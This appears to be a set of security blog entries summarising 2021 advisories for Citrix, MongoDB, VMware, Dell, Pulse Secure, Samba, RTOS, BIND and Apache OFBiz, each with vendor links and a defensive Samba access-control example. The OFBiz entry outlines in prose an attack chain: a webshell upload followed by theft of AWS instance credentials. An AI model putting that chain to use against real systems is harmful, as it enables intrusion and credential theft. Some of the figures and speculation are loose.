Preface: The Improper Access Control weakness describes a case where software fails to restrict access to an object properly.

Background: Citrix Workspace ensures corporate data is safe and malicious activities are spotted quickly. If the installation is user-based, Citrix Workspace app must be installed for each user who logs on to the local machine.

Vulnerability details: Citrix has released security updates to address a vulnerability in Citrix Workspace App for Windows. An attacker could exploit this vulnerability to take control of an affected system. This vulnerability affects all supported versions of Citrix Workspace app for Windows but does not affect Citrix Workspace app on any other platforms. Since vendor do not mentioned explicitly what is the actual flaw. However , whether does it encounter former design weakness again (Refer to diagram for details).

Official announcement: CTX307794 (Citrix Workspace App Security Update) – https://support.citrix.com/article/CTX307794

Preface: The term ‘NoSQL’ means ‘non-relational’. It means that MongoDB isn’t based on the table like relational database structure.

Background: MongoDB storage format called BSON. It is similar to JSON format. Traditional database store data in tabular format. In a MongoDB database, data is stored in collections and a collection has documents. A document has fields and values, like in a JSON. The field types include scalar types (string, number, date, etc.) and composite types (arrays and objects). The query operations on array fields using the db.collection.find() method in the mongo shell. MongoDB supports query operations on geospatial data. MongoDB uses collections of documents instead of tables of rows to organize and store data. In MongoDB, you can store geospatial data as GeoJSON objects or as legacy coordinate pairs.

Vulnerability details: A user authorized to performing a specific type of find query may trigger a denial of service. This issue affects: MongoDB Inc. MongoDB Server v4.4 versions prior to 4.4.4. For more details, please refer to diagram attached.

Remedy: Add stricter parser checks around positional projection
Branch: v4.4 – https://github.com/mongodb/mongo/commit/0c7f643a2dfe4000ac9630ed5dace0cb40ec9740

Preface: vSphere 6.5 – introduction of several new REST APIs included in the vCenter Server Appliance (VCSA).

Background: You can use vRealize Business for Cloud to manage the following VMware products and services: vCenter Server,vCloud Director,vRealize Automation & vRealize Operations Manage. Through the REST API. To get access VCSA appliance. The corresponding API endpoint for available updates are under the [/]rest[/]appliance[/]update section.If you run the API explorer, you will get the following result. Endpoint shows UP_TO_DATE, while VAMI shows 5 available updates.

Vulnerability details: Attackers can exploit this security flaw using management interface (VAMI) upgrade APIs to gain access to unpatched vRealize Business for Cloud Virtual Appliances.

Remedy – Official announcement : https://www.vmware.com/security/advisories/VMSA-2021-0007.html

Background: DBUtil_2_3. Sys is a Windows driver. A driver is a small software program that allows your computer to communicate with
hardware or connected devices. This means that a driver has direct access to the internals of the operating system,
hardware etc.

Vulnerability details: Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges,
denial of service, or information disclosure. Local authenticated user access is required. Vendor plans to release proof of concept code for CVE-2021-21551 on 1st June 2021, said Dell computer.
But we can do the imagination before they announce the update. For details, please refer to diagram.

Official announcement – https://www.dell.com/support/kbdoc/zh-hk/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability

Preface: US Homeland security urge their local country computer users should stay alert of multiple vulnerabilities matter on Pulse Secure product. Perhaps all the world should be aware of it.

Synopsis: As times goes by, Pulse secure acquired juniper SSL VPN product for few years. Perhaps we can remember that Juniper is the active player on telecommunication services provider. Around the world including enterprise firm, they are satisfy with Juniper SSL VPN services.

Security focus: Product Affected by vulnerabilities (PCS: 9.1Rx and 9.0Rx)
CVE-2021-22894 – Buffer overflow in Pulse Connect Secure Collaboration Suite before 9.1R11.4 allows a remote authenticated users to execute arbitrary code as the root user via maliciously crafted meeting room.
CVE-2021-22899 – allows a remote authenticated users to perform remote code execution via Windows File Resource Profiles.
CVE-2021-22900 – allow an authenticated administrator to perform a file write via a maliciously crafted archive upload in the administrator web interface.

Details please refer to link – https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/

Technical background: A Samba file server enables file sharing across different operating systems over a network. It lets you access your desktop files from a laptop and share files with Windows and macOS users.

Vulnerability details: Unprivileged users can delete files in network shares that they shouldn’t access.
However, vendor stated that they conduct analysis of the code paths but not yet confirm the specify way for a remote user to be able to trigger this flaw reproducibly.
Perhaps you may have luck to find out the root causes. For more details, please refer to attached diagram .

Official details (CVE-2021-20254: Fixed a buffer overrun in sids_to_unixids()) – https://www.samba.org/samba/security/CVE-2021-20254.html

Protecting an unpatched Samba server: The easiest way is to use the “Host Allow” and “Host Deny” options in the Samba configuration [smb.conf] file to only allow access to your server from a specific range of hosts. The example is shown below:

[]hosts allow = 127.0.0.1 192.168.2.0/24 192.168.3.0/24[]
[]hosts deny = 0.0.0.0/0[]

Preface: People say that when you walk through rough roads. A brand new road is waiting for you.

Synopsis: Due to the small size of IoT devices, the main component chips will include memory and storage. Even WiFi function. Technically, hardware resembles a car. Therefore, the software (OS) is equivalent a car driver. If the driver is healthy, the entire journey will become smoother. RTOS a key componet on IoT device platform. A reinvented RTOS for IoT needs to support industry-leading communications standards and protocols such as CAN, Bluetooth, Continua, ZigBee, Wi-Fi, and Ethernet, and deliver high-perfor- mance networking capabilities out of the box.

Security Focus: A simple way to describe what is integer overflow. If 2147483647 is stored in the int variable, adding one will become -2147483648. This is similar as integer overflow.

Status: Due to different RTOS platform encounter integer overflow vulnerability. Therefore CISA Releases ICS Advisory on Real-Time Operating System Vulnerabilities. An integer overflow with software programming mistake will amplifier the risk level. The worst case is let attacker conduct remote code execution.

Official announcement: Refer link – https://us-cert.cisa.gov/ics/advisories/icsa-21-119-04

Preface: BIND is the most commonly used DNS software on the Internet today. DNS servers that use BIND as server software account for about 90% of all DNS servers. BIND is now developed and maintained by the ISC(Internet Systems Consortium).

Background: The ISC BIND server contained the vulnerable code within the Simple and Protected GSSAPI Negotiation Mechanism (SPNEGO) component, but ISC did not merge the patch at that time. After 15 years, ISC patched the bug in BIND and assigned it CVE-2020-8625. However, A second new vulnerability was happend in “BIND” again. It is CVE-2021-25216.

Vulnerability details: This vulnerability situation is very complicated. Please refer to the official announcement – https://kb.isc.org/docs/cve-2021-25216

Ref: GSS-TSIG (Generic Security Service Algorithm for Secret Key Transaction) is an extension to the TSIG DNS authentication protocol for secure key exchange. It is a GSS-API algorithm which uses Kerberos for passing security tokens to provide authentication, integrity and confidentiality.
GSS-TSIG uses TKEY records for key exchange between the DNS client and server in GSS-TSIG mode. For authentication between the DNS client and Active Directory.

Preface: According to market statistic, 152 companies that use Apache OFBiz. The companies using Apache OFBiz are most often found in United States and in the Computer Software industry.

Background: Apache OFBiz is a suite of business applications flexible enough to be used across any industry. OFBiz is an open source enterprise resource planning (ERP) system. A common architecture allows developers to easily extend or enhance it to create custom features.

Vulnerability focus: Expert found that lack of file extension check at catalog/control. Therefore it is able to allow to uploading a webshell jsp script. Meanwhile, if the vulnerable system run on top of Amazon Elastic Compute Cloud . It can retrieve the user credential due to AWS design principle.

Reserved set of security-credentials in AWS?

Instance-identity – security credentials are that can be generated using the metadata instance on every EC2 instance in AWS, even when no role is attached to the instance.

Official announcement – https://issues.apache.org/jira/browse/OFBIZ-12080